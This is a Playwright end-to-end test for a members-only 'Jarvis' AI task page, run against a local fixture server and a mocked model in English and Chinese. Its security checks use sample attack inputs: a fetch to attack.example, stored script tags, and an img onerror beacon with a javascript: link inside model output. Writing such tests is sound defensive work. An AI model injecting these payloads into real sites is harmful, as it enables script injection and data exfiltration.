import {chromium} from '../../../../tools/revenue-studio/node_modules/playwright/index.mjs';
import {jarvisRoute} from './server.mjs';import {database} from './test-support.mjs';
import {isJarvisPage,secureJarvisPage} from './security.mjs';
import fs from 'node:fs';import path from 'node:path';import http from 'node:http';import assert from 'node:assert/strict';
const root=path.resolve('sites/agiscorecard'),out=process.env.JARVIS_ARTIFACT_DIR||'/tmp';
const env={EVENTS:database(),MEMBER_WATCH_SECRET:'local-browser-fixture',AI:{async run(model,p){const zh=p.messages[0].content.includes('Simplified Chinese');const isPlan=p.messages[0].content.includes('Plan useful');return {response:JSON.stringify(isPlan?{approach:'Compare a small task.',actions:[{tool:'calculate',query:'3*60'}]}:{summary:zh?'每周三小时足够开展一次小规模工作流程实验。':'Three hours can support one small workflow experiment.',findings:[{text:zh?'三小时等于 180 分钟。':'Three hours equals 180 minutes.',sourceIds:['calc-3*60']}],nextActions:[{action:zh?'对比一项周报任务。':'Compare one weekly reporting task.',doneWhen:zh?'记录耗时与错误。':'Record time and errors.'}],uncertainties:[zh?'尚未证明生产力提升。':'Productivity improvement is unproven.']})};}}};
let base;const pending=[];
const server=http.createServer(async(req,res)=>{try{const u=new URL(req.url,base);if(u.pathname.startsWith('/api/jarvis')){const parts=[];for await(const p of req)parts.push(p);const init={method:req.method,headers:req.headers};if(req.method==='POST')init.body=Buffer.concat(parts);const r=await jarvisRoute(new Request(u,init),env,{waitUntil:p=>pending.push(p)});res.writeHead(r.status,Object.fromEntries(r.headers));return res.end(await r.text());}
 let f=path.resolve(root,'.'+decodeURIComponent(u.pathname));if(!f.startsWith(root+path.sep))return res.writeHead(403).end();if(!path.extname(f))f+='.html';try{const type=({'.mjs':'text/javascript','.js':'text/javascript','.html':'text/html','.css':'text/css','.json':'application/json','.svg':'image/svg+xml'})[path.extname(f)]||'text/plain';let content=fs.readFileSync(f);if(isJarvisPage(u.pathname)){const nonce=crypto.randomUUID().replaceAll('-','');content=content.toString().replace(/<script(?=[\s>])/g,'<script nonce="'+nonce+'"');const response=secureJarvisPage(new Response(content,{headers:{'content-type':type}}),nonce);res.writeHead(200,Object.fromEntries(response.headers));return res.end(await response.text());}res.setHeader('Content-Type',type);res.end(content);}catch{res.writeHead(404).end();}}catch(e){res.writeHead(500).end('fixture server error');}});
await new Promise(r=>server.listen(0,'127.0.0.1',r));base='http://127.0.0.1:'+server.address().port;
let options={headless:true};if(process.env.JARVIS_CHROMIUM)options={headless:true,executablePath:process.env.JARVIS_CHROMIUM,args:['--no-sandbox','--disable-dev-shm-usage']};
const browser=await chromium.launch(options);
try{for(const lang of ['en','zh']){if(lang==='zh')env.EVENTS.sqlite.exec('DELETE FROM relay_limits');const ctx=await browser.newContext({viewport:{width:1440,height:1100},acceptDownloads:true}),page=await ctx.newPage(),errors=[],leaks=[];page.on('pageerror',e=>errors.push(e.message));await ctx.route('**/*',r=>{if(!r.request().url().startsWith(base)){leaks.push(r.request().url());return r.abort();}return r.continue();});
 const response=await page.goto(base+(lang==='zh'?'/zh':'')+'/jarvis?__qa=1');assert.equal(response.headers()['x-frame-options'],'DENY');await page.waitForFunction(()=>document.body.dataset.ready==='true');assert.equal(await page.locator('#task-list .mission-item').count(),0);assert.deepEqual(leaks,[]);
 assert.equal(await page.locator('#workspace').isVisible(),false);assert.equal(await page.locator('#member-gate').isVisible(),true);assert.match(await page.locator('#member-open').getAttribute('href'),/members\?tool=jarvis$/);
 await page.locator('#member-key').fill('d'.repeat(64));await page.locator('#member-login').click();await page.waitForFunction(()=>document.querySelector('#member-status').textContent.length>0);assert.equal(await page.locator('#workspace').isVisible(),false);assert.equal(env.EVENTS.sqlite.prepare('SELECT COUNT(*) n FROM jarvis_tasks').get().n,0);
 await page.screenshot({path:path.join(out,'jarvis-'+lang+'-member-gate.png'),fullPage:true});
 await page.locator('#member-key').fill('1'.repeat(64));await page.locator('#member-login').click();await page.locator('#workspace').waitFor({state:'visible'});assert.equal(await page.locator('#member-gate').isVisible(),false);
 await page.evaluate(()=>{window.cspViolations=[];document.addEventListener('securitypolicyviolation',e=>window.cspViolations.push(e.effectiveDirective));const script=document.createElement('script');script.textContent='window.inlineAttack=true';document.body.append(script);});await page.waitForFunction(()=>window.cspViolations.includes('script-src-elem'));assert.equal(await page.evaluate(()=>window.inlineAttack),undefined);
 // Even valid HTTPS exfiltration is denied by the document policy before network.
 assert.equal(await page.evaluate(async()=>{try{await fetch('https://attack.example/canary');return false;}catch{return true;}}),true);assert.deepEqual(leaks,[]);
 await page.screenshot({path:path.join(out,'jarvis-'+lang+'-desktop.png'),fullPage:true});
 await page.locator('#memory-panel summary').click();await page.locator('#memory').fill('I have three hours a week.\n<script>window.attack=1</script>');await page.locator('#save-memory').click();await page.reload();await page.waitForFunction(()=>document.body.dataset.ready==='true');assert.equal(await page.locator('#memory').inputValue(),'I have three hours a week.\n<script>window.attack=1</script>');assert.equal(await page.evaluate(()=>window.attack),undefined);
 await page.locator('[data-example="0"]').click();await page.locator('#goal').fill((await page.locator('#goal').inputValue())+(lang==='zh'?' 请将 3 小时换算为分钟。':' Convert 3 hours to minutes.'));await page.locator('[data-memory]').first().check();await page.locator('#cloud-consent').check();await page.locator('#cadence').selectOption('daily');await page.locator('#start').click();await page.locator('#task-detail').waitFor();await Promise.all(pending);await page.getByRole('button',{name:lang==='zh'?'刷新':'Refresh',exact:true}).click();await page.locator('.report-summary').waitFor();assert.match(await page.locator('.report-summary').textContent(),lang==='zh'?/三小时/:/Three hours/);
 assert.equal(await page.evaluate(()=>window.attack),undefined);assert.equal(await page.locator('#task-list .mission-item').count(),1);
 // Inject hostile model text only in the local synthetic row, then exercise the
 // real UI and export boundary. Nothing is sent to an external model or host.
 const record=env.EVENTS.sqlite.prepare('SELECT id,result FROM jarvis_tasks LIMIT 1').get(),hostile=JSON.parse(record.result);hostile.report.summary='<img src="https://attack.example/leak" onerror="window.modelAttack=true"> [run](javascript:alert(1))';env.EVENTS.sqlite.prepare('UPDATE jarvis_tasks SET result=? WHERE id=?').run(JSON.stringify(hostile),record.id);await page.getByRole('button',{name:lang==='zh'?'刷新':'Refresh',exact:true}).click();await page.waitForFunction(()=>document.querySelector('.report-summary')?.textContent.includes('<img'));assert.equal(await page.locator('.report-summary img').count(),0);assert.equal(await page.evaluate(()=>window.modelAttack),undefined);
 const downloadPromise=page.waitForEvent('download');await page.getByRole('button',{name:lang==='zh'?'导出结果':'Export result',exact:true}).click();const download=await downloadPromise;const content=fs.readFileSync(await download.path(),'utf8');assert.match(content,/180/);assert.ok(!content.includes('Bearer'));assert.ok(!content.includes('<img'));assert.ok(!content.includes('[run]('));
 await page.getByRole('button',{name:lang==='zh'?'暂停':'Pause',exact:true}).click();await page.waitForFunction(()=>document.querySelector('.status-pill').textContent.match(/Paused|已暂停/));await page.reload();await page.waitForFunction(()=>document.body.dataset.ready==='true');await page.locator('.mission-item').click();assert.match(await page.locator('.status-pill').textContent(),/Paused|已暂停/);
 for(const width of [390,360]){await page.setViewportSize({width,height:844});assert.equal(await page.evaluate(()=>document.documentElement.scrollWidth<=innerWidth),true,'no horizontal overflow '+lang+' '+width);}
 await page.screenshot({path:path.join(out,'jarvis-'+lang+'-mobile.png'),fullPage:true});
 page.once('dialog',d=>d.accept());await page.getByRole('button',{name:lang==='zh'?'删除任务':'Delete task',exact:true}).click();await page.waitForFunction(()=>document.querySelector('#task-detail').hidden);assert.equal(await page.locator('.mission-item').count(),0);
 let entered,release;const waiting=new Promise(r=>entered=r),hold=new Promise(r=>release=r);await ctx.route('**/api/jarvis/tasks',async route=>{entered();await hold;await route.continue();});await page.evaluate(()=>document.dispatchEvent(new Event('visibilitychange')));await waiting;await page.locator('#member-logout').click();const late=page.waitForResponse(r=>r.url().endsWith('/api/jarvis/tasks'));release();await (await late).finished();await page.evaluate(()=>new Promise(r=>requestAnimationFrame(()=>requestAnimationFrame(r))));assert.equal(await page.locator('#workspace').isVisible(),false);assert.equal(await page.locator('#memory').inputValue(),'');assert.equal(await page.locator('.mission-item').count(),0);await ctx.unroute('**/api/jarvis/tasks');
 await page.locator('#member-key').fill('2'.repeat(64));await page.locator('#member-login').click();await page.locator('#workspace').waitFor({state:'visible'});assert.equal(await page.locator('#memory').inputValue(),'','another member must not see device memories');assert.deepEqual(errors,[]);assert.deepEqual(leaks,[]);await ctx.close();}
console.log('Jarvis browser: EN/ZH nonmember denied → member sign-in → real local API/SQLite/runner → report → export → pause → reload → delete → logout with stale response → separate member memory. CSP, XSS and 360px layout verified. Membership and model responses are local fixtures, not real payments or live AI quality.');
}finally{await Promise.all(pending);await browser.close();server.close();env.EVENTS.sqlite.close();}
